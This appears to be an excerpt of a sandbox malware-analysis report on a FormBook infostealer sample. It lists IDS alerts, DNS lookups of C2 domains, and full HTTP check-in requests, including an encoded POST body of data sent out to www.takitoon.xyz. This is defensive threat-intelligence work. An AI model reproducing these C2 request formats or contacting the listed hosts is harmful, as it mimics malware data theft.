            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:61391 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:61413 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:61445 -> 208.91.197.27:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:61398 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:61405 -> 197.189.237.186:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:61405 -> 197.189.237.186:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:61437 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:61423 -> 45.33.18.44:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:61421 -> 45.33.18.44:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:61423 -> 45.33.18.44:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:61434 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:61251 -> 156.242.132.82:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:61408 -> 67.223.117.189:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:61446 -> 208.91.197.27:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:61399 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:61448 -> 208.91.197.27:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:61448 -> 208.91.197.27:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:61414 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:61414 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:61427 -> 54.67.42.145:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:61427 -> 54.67.42.145:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:61431 -> 172.67.181.150:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:61400 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:61431 -> 172.67.181.150:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:61444 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:61444 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:61432 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:61401 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:61401 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:61426 -> 54.67.42.145:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:61442 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:61415 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:61416 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:61417 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:61389 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:61430 -> 172.67.181.150:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:61433 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:61449 -> 156.242.132.82:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:61449 -> 156.242.132.82:80
            Source: DNS query: www.takitoon.xyz
            Source: Joe Sandbox ViewIP Address: 38.47.233.65 38.47.233.65
            Source: Joe Sandbox ViewIP Address: 156.242.132.82 156.242.132.82
            Source: Joe Sandbox ViewIP Address: 67.223.117.189 67.223.117.189
            Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
            Source: Joe Sandbox ViewASN Name: POWERLINE-AS-APPOWERLINEDATACENTERHK POWERLINE-AS-APPOWERLINEDATACENTERHK
            Source: Joe Sandbox ViewASN Name: VIMRO-AS15189US VIMRO-AS15189US
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,0_2_004422FE
            Source: global trafficHTTP traffic detected: GET /54aa/?lLYL=kvUX&5vc=YMphRbBqYD1qziPfcxWfV7OUDSA3QU5FUkSnoqDZt26OzjZirNwjAGjBpWvuubqos1AuwzhTz+mW7CpJxDFhVa/HfUjNfzfl4NcBItZkd8PY3xDlIjidjox4juNb6YkC0urLz9Q= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.shanhaiguan.netConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
            Source: global trafficHTTP traffic detected: GET /4qpg/?lLYL=kvUX&5vc=7YL4gquCN0E55MFUOU9pAg/pZfkwLQQKii7X4zB1/APnuYQ63ytlc9rdDU84d9EdPhCMcrEauI5xN2RdLzEruIlUX3fWqfOqjWcwC1p6yjm3sUGyC92I8On0vrGkOogLmLiKp0c= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.takitoon.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
            Source: global trafficHTTP traffic detected: GET /g9xe/?5vc=MLCfwq0OLzOW6QPmgLFQnuGoPPrQyzTDS43mRmpffLpQSwrMWSBFbGoKeLq/FK43j0+k/VozFS/nBlsWqz4m9kWG5HZt62rlPRgv7u+rlw8JrCSD2NF9WC2SMGJleFo1CnmOFq8=&lLYL=kvUX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.nng65.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
            Source: global trafficHTTP traffic detected: GET /fxts/?5vc=KBrNmZFmj0ul2oD2qgnroh/wQ2h5AjW2d9F4abtF0F4CaovzTwTYRyu6DykZf8dcdN4xXWNYZBLXZ4+qzslzTuV7y9B6gd/Ri+hABrjyhRVbSEt0nKDUfa/P8q39BOk9hsMan7o=&lLYL=kvUX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.bayarcepat19.clickConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
            Source: global trafficHTTP traffic detected: GET /x557/?5vc=giAstKbG1JvvSEHvPZxdSSM3KyfVinJMbmE6i5V8cuPr9HW8zP8h8UUcUfsu4P3tPpyGgBHfZyFCt865pXgydxC+b0QJblKsDInl9u5dqfz1OH+RWteaPpXHUBQMRwPVkFLc/Ks=&lLYL=kvUX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.patioprojex.africaConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
            Source: global trafficHTTP traffic detected: GET /bcpd/?5vc=00X9d/BTKK5R5e14wWEt126s+mdVGBYlWg3KruQB0GNMBll6v3rooUlUxbesnPMHDrwLyGZxaHgZZw9MEvoNzTeh6b+sdgkolwxMs8g4smMKoeawjyQiJRB92JfMM9Rn76Nc6Cg=&lLYL=kvUX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.gutpox.lifeConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
            Source: global trafficHTTP traffic detected: GET /4q0i/?5vc=Mtjl+FxSDFp18/BZR6oNC2DOD+4HgiEAKAntLL23ldF4UbjsNYBtxHiYQGIEs/p+ZIYPMWFkhQRucvjI1Y3PYOaDxPUXp4ZORiVeXJKAwrXw2/vN6xU2Cfcx0UqMhVjm/OzR1n4=&lLYL=kvUX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.rmgltd.servicesConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
            Source: global trafficHTTP traffic detected: GET /7u7b/?lLYL=kvUX&5vc=2Z5kGOkuv5pVGp5caE9S+AlLzK7psx26l1r4OVTTo/mJv8+h8gvJJdoe4aGwZK+fAJooQPvCRx2bg5uJuIXMrI8i6EsIC7ECcfl7eR40SkVxjNn20IyYqrUIILkrtqNDTrCWbBw= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.turbonotes.appConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
            Source: global trafficHTTP traffic detected: GET /m2fa/?5vc=dxr5sM7JCjMGBGCjIKoGXP57auD2woMmhc019revMrXoU+YJAMGjsVqej+5clXTWRUV25xXwqTTfL+6H/dW45fVBvf5lv9WIouIxkQPPkB4gfD2v1rHBNnilbi/howM7CAP8IRw=&lLYL=kvUX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.tempmai.lolConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
            Source: global trafficHTTP traffic detected: GET /2i23/?5vc=bKA+uOpFda5dGdFXdnTLNkRmhJBOP9S0HCpQNG3UnGEkxT/oTZLAjGTvHx4TKdTffd9QN0N/OlpfyxtP6tcBddlohGt5l/spne/Xm9eGrkU+7BisppRJ0X6uxZ9HBJ4oDTdSaxo=&lLYL=kvUX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.kx507981.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
            Source: global trafficHTTP traffic detected: GET /m3ct/?5vc=zEwq1iaMF/uCsqziz8qMUhXCXmUco/L+vi+T8f7QvA3w3jxbUYr6DIVUG7Wad/XDR1ZvfFtvoxN1EeB5BAcej8YfbKSiuNBAZGSPTmsYajwE5YNxObykffmIIzNg2h0GVq7a1DE=&lLYL=kvUX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.aaavvejibej.bondConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
            Source: global trafficHTTP traffic detected: GET /7ts8/?lLYL=kvUX&5vc=VgfHXYqklmOf3gIY6JX4+MSwLZFx3fC4t3URmGvQc8lOLOm3On7tbGBltUCUb2EMakaNsP50tNqrd0nnNZuXCCSXzQ7vSeHOGGO1wR7Laf4A+YuB3YDb13HLVs/KWc3twln2EFc= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.myjiorooms.servicesConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
            Source: global trafficHTTP traffic detected: GET /9iab/?5vc=Y4kDenUp1gO2Q0jRiZUxMqowayno9Xsk2AlmB9dDBLZOc6V7t85yetNjHcmH7slMwyaAfgZ0o1D1+bSHqn/hHAccGgPOonKwLb4ZCbzMyRuUgcD/rdhA1bXMlxtgx1iShR1I/OE=&lLYL=kvUX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.ultraleap.netConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
            Source: global trafficHTTP traffic detected: GET /ow7w/?lLYL=kvUX&5vc=p1G8XVp3dTmrBOooBHOazFGeIrxM1J3oyb4/irL+UWW2iE7BpWwBAaQNTChmqclkWYPZ2V3tJwkqHmUMbW57TcftwINdn5ScJT94TdCNnEqMkWAGcRU1jqFlvrtrVO/HPFIHZdo= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.takeun.clubConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
            Source: global trafficHTTP traffic detected: GET /8l0y/?5vc=gpZ7O9wJuofu6jQ+zhbQfshngqVv9cE5kPyoFYRIcR03yvbe/BOPGk6xXKz30nptSiLZCe/Z5fLwL00E8raoZSt1+2D0KaGk+ev1JjVnWNJk73VZkcb+ifONmJiX1s5MbYZXBXE=&lLYL=kvUX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.crochetpets.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
            Source: global trafficHTTP traffic detected: GET /54aa/?lLYL=kvUX&5vc=YMphRbBqYD1qziPfcxWfV7OUDSA3QU5FUkSnoqDZt26OzjZirNwjAGjBpWvuubqos1AuwzhTz+mW7CpJxDFhVa/HfUjNfzfl4NcBItZkd8PY3xDlIjidjox4juNb6YkC0urLz9Q= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.shanhaiguan.netConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
            Source: global trafficDNS traffic detected: DNS query: www.shanhaiguan.net
            Source: global trafficDNS traffic detected: DNS query: www.useanecdotenow.tech
            Source: global trafficDNS traffic detected: DNS query: www.takitoon.xyz
            Source: global trafficDNS traffic detected: DNS query: www.nng65.top
            Source: global trafficDNS traffic detected: DNS query: www.bayarcepat19.click
            Source: global trafficDNS traffic detected: DNS query: www.patioprojex.africa
            Source: global trafficDNS traffic detected: DNS query: www.gutpox.life
            Source: global trafficDNS traffic detected: DNS query: www.rmgltd.services
            Source: global trafficDNS traffic detected: DNS query: www.turbonotes.app
            Source: global trafficDNS traffic detected: DNS query: www.tempmai.lol
            Source: global trafficDNS traffic detected: DNS query: www.kx507981.shop
            Source: global trafficDNS traffic detected: DNS query: www.aaavvejibej.bond
            Source: global trafficDNS traffic detected: DNS query: www.myjiorooms.services
            Source: global trafficDNS traffic detected: DNS query: www.ultraleap.net
            Source: global trafficDNS traffic detected: DNS query: www.takeun.club
            Source: global trafficDNS traffic detected: DNS query: www.crochetpets.online
            Source: unknownHTTP traffic detected: POST /4qpg/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brHost: www.takitoon.xyzOrigin: http://www.takitoon.xyzConnection: closeContent-Type: application/x-www-form-urlencodedCache-Control: no-cacheContent-Length: 208Referer: http://www.takitoon.xyz/4qpg/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0Data Raw: 35 76 63 3d 32 61 6a 59 6a 65 4b 34 4e 55 4e 39 37 4e 78 57 46 56 55 61 64 79 58 70 50 76 31 4a 4a 79 34 46 6e 51 66 36 78 7a 39 67 78 68 6d 79 71 4a 6f 71 78 53 6b 69 56 64 76 67 44 43 35 44 47 34 55 32 4c 6c 4b 4e 4e 72 78 47 6a 74 78 48 63 68 30 63 42 79 4e 30 6f 72 41 53 61 33 65 74 70 2f 50 33 36 47 34 72 48 68 68 4b 77 44 69 51 6b 54 4b 43 4e 76 53 4e 38 64 4c 6b 6f 75 32 6d 4e 49 4e 78 33 38 65 78 70 51 42 57 41 65 37 6b 57 2f 55 76 62 46 2b 6f 61 43 37 64 72 75 6e 6e 64 38 31 33 4c 73 44 71 46 6b 43 48 33 71 46 4a 36 66 76 62 2b 6f 54 33 4e 4f 7a 4f 59 70 4b 5a 44 6e 36 39 78 7a 41 66 4a 71 4a 47 43 76 2b 4d Data Ascii: 5vc=2ajYjeK4NUN97NxWFVUadyXpPv1JJy4FnQf6xz9gxhmyqJoqxSkiVdvgDC5DG4U2LlKNNrxGjtxHch0cByN0orASa3etp/P36G4rHhhKwDiQkTKCNvSN8dLkou2mNINx38expQBWAe7kW/UvbF+oaC7drunnd813LsDqFkCH3qFJ6fvb+oT3NOzOYpKZDn69xzAfJqJGCv+M
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 10 Oct 2024 10:52:06 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 10 Oct 2024 10:52:09 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 10 Oct 2024 10:52:11 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 10 Oct 2024 10:52:11 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 10 Oct 2024 10:52:11 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 10 Oct 2024 10:52:14 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
